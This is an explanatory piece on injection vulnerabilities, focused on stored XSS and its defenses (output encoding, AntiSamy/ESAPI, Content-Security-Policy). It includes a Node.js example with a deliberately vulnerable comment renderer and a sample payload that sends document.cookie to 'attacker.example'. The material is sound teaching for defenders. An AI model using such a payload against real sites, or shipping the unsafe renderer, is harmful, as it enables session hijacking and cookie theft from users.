Injection
Introduction
Injection vulnerabilities arise when an application builds a command, query or document out of untrusted input, usually supplied through a form field, URL parameter or HTTP header, without keeping the data separate from the surrounding code. The affected technologies include SQL, HTML, JavaScript, operating-system shells and others; in each case the interpreter cannot tell where the developer's code ends and the attacker's data begins. Although these flaws are well known and thoroughly documented, injection attacks such as SQL injection continue to pose a threat to organizations. A successful exploit can give the attacker anything from limited read access to full control of the target system, depending on where the injected input is interpreted. Several families of injection flaw exist in web applications, categorized by the protocol or technology being targeted, and each has its own exploitation techniques and defenses.
Cross-Site Scripting (XSS)
Protocol/Technology Affected:
Cross-Site Scripting (XSS) vulnerabilities are web application vulnerabilities that take advantage of the way browsers interpret scripts included in web pages: when an application places untrusted input into a page without encoding it, the browser cannot distinguish the attacker's markup from the developer's. These vulnerabilities affect HTML, JavaScript and other client-side technologies, and are commonly classified as stored, reflected or DOM-based depending on where the injected input is kept and where it is inserted into the page.
Example of Exploit:
A common attack against a web application with an XSS vulnerability is to submit a comment containing a script element, for example through the comment box of the targeted website. If the input is not validated and encoded correctly, the application stores the comment and later renders it with the script embedded, and the script runs in the browser of every user who opens that page. The consequences include session hijacking, defacement of the page, and theft of cookies or other data the page can reach.
One Way to Defend Against Exploitation:
The primary defense against XSS is contextual output encoding at the point where untrusted data is written into the page, combined with input validation. Output encoding does not strip script tags; it converts characters such as <, >, &, quotes and apostrophes into their HTML entity equivalents so that the browser treats them as text rather than markup, and the encoding must match the context (HTML body, attribute, JavaScript or URL) in which the data is placed. Where an application must accept a subset of HTML from users, a sanitizing library such as OWASP AntiSamy can be used to allow only a whitelist of safe elements and attributes, and the OWASP ESAPI encoders provide the context-specific encoding functions. As an additional layer, the server can send a Content-Security-Policy (CSP) header that restricts the sources from which the browser will execute scripts and, when 'unsafe-inline' is omitted from script-src, refuses to run inline scripts injected into the page.
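The following is an added example, not code from the original paper or from OWASP, illustrating both the stored-XSS scenario in the exploit section and the encoding and CSP defenses described above. It is a small Node.js (server-side) comment renderer in two versions: one that concatenates raw user input into HTML, and one that HTML-encodes it first, plus a CSP header value that blocks inline scripts. The function names, the attacker hostname and the sample payload are all constructed for the example.

```javascript
// Added example (not from the original paper): vulnerable vs. encoded
// rendering of a user comment, and a Content-Security-Policy header.
// Names, the attacker.example host and the payload are constructed.

// Constructed sample inputs: a benign comment and a cookie-stealing payload
// of the kind an attacker would paste into a comment box.
const BENIGN_COMMENT = "Great article, thanks!";
const XSS_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Vulnerable: user input lands in the HTML body context unchanged, so a
// <script> element inside the comment becomes a real script element in
// the page and runs in every visitor's browser.
function renderCommentUnsafe(author, body) {
  return `<li class="comment"><b>${author}</b>: ${body}</li>`;
}

// Defense: output encoding for the HTML body / quoted-attribute context.
// These five characters are the ones that can change meaning there;
// encoding them makes the browser render the payload as visible text.
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

function renderCommentSafe(author, body) {
  return `<li class="comment"><b>${encodeForHtml(author)}</b>: ${encodeForHtml(body)}</li>`;
}

// Crude check used only to show the difference between the two renderers:
// does the rendered fragment still contain a live <script> start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defense in depth: a CSP that lets the browser run only scripts served
// from the site's own origin. Because 'unsafe-inline' is absent from
// script-src, inline <script> blocks and inline event handlers are refused.
const CSP_HEADER = {
  name: "Content-Security-Policy",
  value: "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'",
};

// Returns true when a CSP value would still allow inline scripts, i.e. when
// its script-src directive contains 'unsafe-inline'.
function cspAllowsInlineScript(cspValue) {
  const scriptSrc = cspValue
    .split(";")
    .map((d) => d.trim())
    .find((d) => d.startsWith("script-src "));
  return scriptSrc !== undefined && scriptSrc.includes("'unsafe-inline'");
}

// Stand-alone demo: the unsafe rendering keeps the script live, the safe
// rendering turns it into harmless text.
console.log(renderCommentUnsafe("mallory", XSS_PAYLOAD));
console.log(renderCommentSafe("mallory", XSS_PAYLOAD));
console.log(renderCommentSafe("alice", BENIGN_COMMENT));
console.log(`${CSP_HEADER.name}: ${CSP_HEADER.value}`);
```

Note that encodeForHtml is correct only for the HTML body and quoted-attribute contexts; data placed inside a JavaScript block, a URL or a CSS value needs the encoder for that context, which is why the paper's recommendation of a library such as ESAPI matters in practice.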